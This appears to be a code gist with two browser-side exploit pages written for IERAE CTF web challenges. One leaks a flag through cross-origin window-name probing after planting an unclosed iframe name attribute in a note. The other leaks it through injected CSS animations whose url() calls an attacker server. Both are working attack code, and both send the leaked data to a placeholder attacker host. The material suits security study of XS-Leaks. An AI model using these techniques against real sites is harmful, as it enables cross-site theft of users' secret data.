@satoooon8888
Created September 22, 2024 06:12
IERAE CTF web challenges — two browser-side exploit pages (XS-Leak style); replace the `YOUR_SERVER` placeholder in `EXP_HOST` with the attacker-controlled host before serving either page.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Exploit</title>
</head>
<body>
<script type="text/javascript">
// Attacker-controlled origin that receives the exfiltrated prefixes; the
// placeholder must be replaced before this page is served to the victim.
const EXP_HOST = 'http://YOUR_SERVER';
// Target application, as reachable from the browser that runs this page.
const WEB_HOST = 'http://web:3000';
// Candidate alphabet tried for each flag position. The closing brace is part
// of the alphabet so the search can reach the end of an `IERAE{...}` flag.
const CHARS = 'abcdefghijklmnopqrstuvwxyz}';
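// Resolve after `msec` milliseconds. Plain (non-async) arrow: the function never
// awaits, so the `async` wrapper only added a redundant promise layer.
const sleep = (msec) => new Promise((resolve) => { setTimeout(resolve, msec); });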
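// Exfiltrate `path` by requesting it from the attacker host. The stray
// `debugger;` statement was removed: it stalls the exploit whenever DevTools
// is attached and contributes nothing to the request.
// NOTE(review): if EXP_HOST sends no CORS headers the returned promise rejects
// after the request has already been sent; the log line still reaches the
// server, so callers should not treat a rejection here as fatal.
const log = async (path) => {
  await fetch(`${EXP_HOST}${path}`);
};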
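// Build a throw-away <form> with one field per entry of `params` and submit it.
// method: HTTP method ("POST"/"GET"); action: URL; target: window name or
// "_blank" (default). Returns nothing; the submission navigates `target`.
const submitForm = (method, action, params, target = "_blank") => {
  const form = document.createElement("form");
  form.method = method;
  form.action = action;
  form.target = target;
  for (const [name, value] of Object.entries(params)) {
    const input = document.createElement("input");
    // "hidden", not "text": the text-type value sanitizer strips CR/LF, which
    // silently altered any multi-line value handed to this helper.
    input.type = "hidden";
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  document.body.appendChild(form);
  form.submit();
  // The submission is queued by submit(); the node is no longer needed and
  // would otherwise accumulate in <body> on every call.
  form.remove();
};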
const HIT_NAME=`</li>\n<li><span class=`;
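// Cross-origin window-name probe for one candidate flag prefix `s`.
// Opens the search page for `s` in a popup and reads `w[HIT_NAME]` on that
// cross-origin window: a named-frame lookup succeeds (returns a WindowProxy)
// only when a frame with that name exists in the page, otherwise the access
// throws a SecurityError. Only throw/no-throw carries information — the
// original `typeof` result was always a truthy string.
// Returns true when the frame exists, false otherwise. Throws when the popup
// is blocked (the original crashed on `null.close()` in that case).
const oracle = async (s) => {
  const w = open(`${WEB_HOST}/?query=${s}`);
  if (w === null) {
    throw new Error("popup was blocked");
  }
  // give the search page time to load before probing
  await sleep(300);
  try {
    void w[HIT_NAME];
    return true;
  } catch (e) {
    console.log(e);
    return false;
  } finally {
    // always close the popup, whichever branch was taken
    w.close();
  }
};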
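// Extend `prefix` by one character: try every character of CHARS through
// oracle() and return the first candidate it accepts.
// Throws an Error when no character is accepted (that is also how the caller's
// loop terminates once the flag is complete).
const leak = async (prefix) => {
  for (const c of CHARS) {
    const candidate = prefix + c;
    if (await oracle(candidate)) {
      return candidate;
    }
  }
  // `new` was missing; the message is kept as the author wrote it
  throw new Error("nope");
};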
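// Drive the leak: plant a note whose content opens an iframe name attribute
// (presumably capturing the following markup, up to the next quote, as the
// frame's name), then recover the flag one character at a time.
// Never returns normally: the loop has no exit of its own and ends when leak()
// throws because no character in CHARS extends the prefix; the caller's catch
// logs that. Each recovered prefix is also sent to EXP_HOST.
const exploit = async () => {
  submitForm("POST", `${WEB_HOST}/create`, {
    note: '<iframe name="',
  });
  // let the note be stored before the first probe
  await sleep(1000);
  let prefix = "IERAE{";
  while (true) {
    prefix = await leak(prefix);
    // fire-and-forget exfil; a rejected fetch must not stop the leak, and it
    // must not surface as an unhandled rejection either
    log(`/log?${prefix}`).catch((e) => console.log(e));
  }
};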
// Entry point. exploit() only ever leaves through an exception (its loop has
// no exit), so the catch below is the normal end of a run and "Finished
// exploit" is not expected to print.
(async () => {
  console.log("Start exploit");
  await exploit();
  console.log("Finished exploit");
})().catch((err) => {
  console.log(err);
});
</script>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Exploit</title>
</head>
<body>
<script type="text/javascript">
// Attacker-controlled origin that receives the /hit callbacks; the placeholder
// must be replaced before this page is served to the victim.
const EXP_HOST = 'http://YOUR_SERVER';
// Target application, as reachable from the browser that runs this page.
const WEB_HOST = 'http://web:3000';
// Candidate alphabet tried for each flag position: lowercase letters only.
// Note that no closing brace is included, so the loop in exploit() has no way
// to observe the end of the flag on its own.
const CHARS = 'abcdefghijklmnopqrstuvwxyz';
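// Resolve after `msec` milliseconds. Plain (non-async) arrow: the function never
// awaits, so the `async` wrapper only added a redundant promise layer.
const sleep = (msec) => new Promise((resolve) => { setTimeout(resolve, msec); });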
// Exfiltrate `path` by requesting it from the attacker host. Not referenced by
// exploit() on this page — the leak signal there travels through the CSS
// url() planted by leak() — but kept as a helper.
const log = async (path) => {
  const target = `${EXP_HOST}${path}`;
  await fetch(target);
};
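// Build a throw-away <form> with one field per entry of `params` and submit it.
// method: HTTP method ("POST"/"GET"); action: URL; target: window name or
// "_blank" (default). Returns nothing; the submission navigates `target`.
const submitForm = (method, action, params, target = "_blank") => {
  const form = document.createElement("form");
  form.method = method;
  form.action = action;
  form.target = target;
  for (const [name, value] of Object.entries(params)) {
    const input = document.createElement("input");
    // "hidden", not "text": the text-type value sanitizer strips CR/LF, which
    // silently altered multi-line values such as the stylesheet leak() passes.
    input.type = "hidden";
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  document.body.appendChild(form);
  form.submit();
  // The submission is queued by submit(); the node is no longer needed and
  // would otherwise accumulate in <body> once per probed character.
  form.remove();
};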
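// Probe every character of CHARS as the next character after `prefix`.
// For each candidate: open the search page for it in a popup named after the
// candidate, then navigate that same popup (via the form's `target`) to a
// freshly created note whose stylesheet animates the ::view-transition
// pseudo-elements of `site-title`; the keyframe's first frame requests a URL
// on EXP_HOST, so the callback fires only when that transition actually runs
// for this navigation. Per the author's note: if the prefix is hit, the flag
// doesn't start with the prefix — presumably the attacker's /prefix endpoint
// turns the hits into the next prefix.
// Returns nothing; the result is observed server-side. Throws if the popup
// is blocked (the original would have failed on `null.focus()`).
const leak = async (prefix) => {
  for (const c of CHARS) {
    const candidate = prefix + c;
    const w = open(`${WEB_HOST}/?search=${candidate}`, candidate);
    if (w === null) {
      throw new Error("popup was blocked");
    }
    try {
      // let the search page load before navigating it
      await sleep(300);
      w.focus();
      submitForm("POST", `${WEB_HOST}/create`, {
        title: `note-${candidate}`,
        body: candidate,
        // CSS kept byte-identical to the author's payload
        style: `
@keyframes anim {
0% {
background-image: url(${EXP_HOST}/hit?leak=${prefix}/${c});
}
}
::view-transition-old(site-title) {
animation: 0.01s linear both anim;
}
::view-transition-new(site-title) {
animation: 0.01s linear both anim;
}
`
      }, candidate);
      // give the navigation (and the transition) time to run
      await sleep(300);
    } finally {
      // always close the popup, even if the form submission threw
      w.close();
    }
  }
};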
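// Drive the leak round by round: probe every character after the current
// prefix, then ask our own server (the relative URL resolves against this
// page's origin) for the prefix it derived from the callbacks.
// The loop has no exit condition — CHARS contains no closing brace, so the
// end of the flag is never observed here; stop the page once the flag is out.
// Throws if leak() throws or if /prefix does not answer with a 2xx.
const exploit = async () => {
  let prefix = "IERAE{";
  while (true) {
    await leak(prefix);
    await sleep(300);
    const res = await fetch("/prefix");
    // an error page body must not become the next prefix
    if (!res.ok) {
      throw new Error(`/prefix returned HTTP ${res.status}`);
    }
    prefix = await res.text();
  }
};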
// Entry point. exploit() loops without an exit condition, so "Finished
// exploit" is only reached if it ever returns; any error ends up in the
// catch below.
(async () => {
  console.log("Start exploit");
  await exploit();
  console.log("Finished exploit");
})().catch((err) => {
  console.log(err);
});
</script>
</body>
</html>